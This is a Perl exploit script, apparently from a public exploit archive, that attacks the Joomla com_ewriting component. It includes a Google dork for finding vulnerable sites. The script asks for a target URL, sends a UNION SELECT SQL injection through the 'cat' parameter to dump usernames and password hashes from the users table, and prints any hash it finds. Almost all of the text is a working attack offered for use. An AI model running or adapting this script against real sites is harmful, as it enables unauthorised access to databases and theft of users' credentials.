Joomla Exploit

1. #!/usr/bin/perl
2. #Exploit title: Joomla Component com_ewriting SQL Injection exploit
3. #Google Dork: inurl:index.php?option=com_ewriting
4. #Exploit Author: M4XS4L1M1
5.  
6. system("color a");
7. print "*********************************************\n";
8. print "*     Joomla Component com_ewriting         *\n";
9. print "*             SQL Injection                 *\n";
10. print "*           Script by M4XS4L1M1               *\n";
11. print "*   Thanks To BlackCyberRoot & AnonCoders   *\n";
12. print "*********************************************\n";
13. sleep 1;
14. use LWP::UserAgent;
15. print "Enter the target --> ";
16. chomp(my $target=<STDIN>);
17. $code="UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+"+pre+"_users--;";
18. $agent = LWP::UserAgent->new() or die "[!] Error while processing";
19. $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
20. $host= $target. "/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1==".$code;
21. $ok = $agent->request(HTTP::Request->new(GET=>$host));
22. $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
23. print "[+] Password found --> $1\n$2\n";
24.  
25. sleep 1;
26. }
27. else
28. {
29. print "Password not found \n";
30. }